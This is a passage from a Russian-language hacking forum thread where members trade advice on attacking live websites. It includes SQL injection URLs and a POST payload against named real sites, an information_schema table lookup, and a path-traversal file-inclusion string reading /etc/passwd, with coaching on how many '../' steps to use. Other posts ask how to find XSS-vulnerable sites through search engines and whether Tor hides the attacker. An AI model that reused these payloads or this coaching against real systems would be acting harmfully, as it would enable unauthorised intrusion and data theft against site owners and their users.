Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    смотрите имя темы, и подумайте, является ли ваш вопрос "вопросом по уязвимостям"

    здесь обсуждают уязвимости, а не программы которые ищут уязвимости в гугле и тп.. это не для нашего форума

    надеюсь ясно высказался..
     
    _________________________
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    попробуй

    SELECT `name` FROM lower(`users`) WHERE `user_id` = 1
     
  3. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    так нарушается синтаксис и выдает ошибку.
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    SELECT `name` FROM lower('users') WHERE `user_id` = 1

    возможно, так
     
    1 person likes this.
  5. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    эти функции распространяются только на элементы выборки. с именами таблиц такое не катит.
     
    2 people like this.
  6. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9
    Code:
    http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5,6,7,8,9
    I cannot get vulnerable column why?

    And no, I don't wanna use blind.
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    Code:
    cmd> POST /news.php HTTP/1.0
    newsid=1320+and+0+union+select+1,2,3,4,5,6,7,8,9--+
     
    _________________________
  8. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.
    В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.

    верно:
    Code:
    SELECT * FROM tablename WHERE tablename.columnname=1;
    SELECT * FROM TableName WHERE TableName.columnname=1;
    неверно:
    Code:
    SELECT * FROM TableName WHERE tablename.columnname=1;
    SELECT * FROM tablename WHERE TableName.columnname=1;

    upd:
    Ошибся. Все таки таблицы - это файлы :rolleyes:
     
    #18908 M_script, 8 Jan 2012
    Last edited: 8 Jan 2012
  9. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    http://dev.mysql.com/doc/refman/5.0/en/identifier-case-sensitivity.html

    сервер выдает ошибку в уже верхнем регистре, т.е. еще до отправки он перевел в верхний регстр запрос
    Invalid query: Table 'sqlbd1.ABC_USER' doesn't exist

    abc_user 100% существует (проверял в information_schema)
     
  10. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Может быть abc_user просто в другой базе?
    Проверь.

    union+select+1,2,table_schema+from+information_schema.tables+where+table_name=0x6162635f75736572
     
    #18910 stepashka_, 8 Jan 2012
    Last edited: 8 Jan 2012
    2 people like this.
  11. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    самое веселое что и 0x6162635f75736572
    он переводит в 0X6162635f75736572 и в итоге ничего не выходит, я вытаскивал по символу через sleep(), база и таблаца верная.

    ладно. похоже тут ничего не сделать.
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Блин, RED, поделись уже ссылкой.
     
  13. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    А что это? ;)
     
    1 person likes this.
  14. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Я уже дофига статей прочитал и просмотрел видео по xss и хочу попробовать на деле, только сканер xss по левому сканирует , я нашел online-scaner xss , подскажите мне пожалуйста как в гугле искать простые сайты чтобы найти в них xss , мне просто очень важно найти такой сайт а далше я уже сам разберусь. Благодарнен за любую помощь.
     
  15. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://forum.antichat.ru/thread35802.html
     
  16. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    stepashka_ , скажу чесно дело в том что я боюсь на популярных сайтах тренироваться чтобы потом проблем небыло , или Tor достаточно для этих сайтов?
     
    #18916 NZT, 8 Jan 2012
    Last edited: 8 Jan 2012
  17. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Вот из темы PHP иньекций я взял пример
    Code:
    http://bombaticket.ru/pg.php?p=../../../../../etc/passwd%00
    Скажите пожалуйста, как узнать сколько подставлять ../ ? Это путь до файла на сколько я понял, но где это смотреть, в самой ошибке? Вот ошибка
    Code:
    Warning: include(htm/fgh.htm) [function.include]: failed to open stream: No such file or directory in /home/www/z74500/bombaticket.ru/pg.php on line 97
    Объясните пож-та на данном примере что именно ../../../../../etc/passwd%00 надо подставлять.
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    ../ = директорыя выше

    ./ = данная директория

    дир = /papka1/papka2/papka3/

    чтобы выйти за пределы этих папок, надо подставить 3 пары
    ../../../

    в твоем примере

    папка = /home/www/z74500/bombaticket.ru/

    то есть надо подставь 4 пары (../../../../) чтобы смогли подключить файлы начиная с корневой директории
     
    _________________________
  19. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Спасибо, понятно, но в моём примере стоит 5 пар (../../../../../), или я что-то не допонял.
     
  20. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    / 5 home/ 4 www/ 3 z74500/ 2 bombaticket.ru/ 1 pg.php
    не?
     
Thread Status:
Not open for further replies.